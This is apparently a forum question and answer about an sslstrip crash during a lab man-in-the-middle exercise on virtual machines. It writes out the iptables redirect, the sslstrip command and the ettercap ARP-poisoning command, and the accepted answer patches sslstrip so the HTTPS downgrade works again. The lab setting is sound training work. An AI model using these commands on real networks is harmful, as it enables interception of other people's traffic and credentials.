# sslstrip gives error "exceptions.AttributeError: 'int' object has no attribute 'splitlines'" when used with ettercap

Tags: man-in-the-middle, sslstrip, ettercap

I have 3 VM's running in VirtualBox. All 3 VM's are connected to a virtual network created from VirtualBox with the IP 192.168.56.1/24

For all VM's are configured `Host only Adapter`

1 Linux web server that hosts the OWASP broken web applications : 192.168.56.3

2 windows machine that is a client accessing the website : 192.168.56.5

3 Kali linux machine performing a man in the middle attack : 192.168.56.4

Here is what I did.

**sslstrip is started**

First sslstrip is started.

```
echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

sslstrip -l 8080 --favicon --write=/root/Lessons/sslstrip/sslstrip.log
```

**ettercap is started**

```
ettercap --mitm ARP:REMOTE --quiet --text --write ~/Lessons/ettercap/ettercap.log --iface eth0 /192.168.56.3// /192.168.56.5//
```

Output

```
Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.56.3 08:00:27:FE:F6:AC

 GROUP 2 : 192.168.56.5 08:00:27:E6:E5:59
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help
```

Now from the windows client browser I visit the home page `192.168.56.3/`

It loads correctly.

Now I click one of the links, Mutillidae II

This causes an error in sslstrip

```
Unhandled Error
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
    why = selectable.doRead()
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 243, in doRead
    return self._dataReceived(data)
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 249, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/usr/local/lib/python2.7/dist-packages/twisted/protocols/basic.py", line 579, in dataReceived
    why = self.rawDataReceived(data)
  File "/usr/local/lib/python2.7/dist-packages/twisted/web/http.py", line 649, in rawDataReceived
    self.handleResponseEnd()
  File "/usr/local/lib/python2.7/dist-packages/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
    HTTPClient.handleResponseEnd(self)
  File "/usr/local/lib/python2.7/dist-packages/twisted/web/http.py", line 612, in handleResponseEnd
    self.handleResponse(b)
  File "/usr/local/lib/python2.7/dist-packages/sslstrip/ServerConnection.py", line 131, in handleResponse
    self.client.setHeader('Content-Length', len(data))
  File "/usr/local/lib/python2.7/dist-packages/twisted/web/http.py", line 1314, in setHeader
    self.responseHeaders.setRawHeaders(name, [value])
  File "/usr/local/lib/python2.7/dist-packages/twisted/web/http_headers.py", line 220, in setRawHeaders
    for v in self._encodeValues(values)]
  File "/usr/local/lib/python2.7/dist-packages/twisted/web/http_headers.py", line 40, in _sanitizeLinearWhitespace
    return b' '.join(headerComponent.splitlines())
exceptions.AttributeError: 'int' object has no attribute 'splitlines'
```

If I manually put `https` in the address bar, this error doesn't happen. But then no SSL stripping happens.

Comment: You've left out what the link actually is. That appears to be the important part.

Comment: Do you know what the error means? `headerComponent` is being passed as an `int`. If you are using an IP address, that might be the problem. You might need to use a domain name

Answer (score 1, accepted):

Since Twisted 19.2.0, the headers' values are expected to be in byte string but the value of the 'Content-Length' header passed by SSLstrip to Twisted is `len(data)` and this is an integer. So if you replace `len(data)` with `str(len(data))` in

```
File "/usr/local/lib/python2.7/dist-packages/sslstrip/ServerConnection.py", line  131
```

it should do the trick.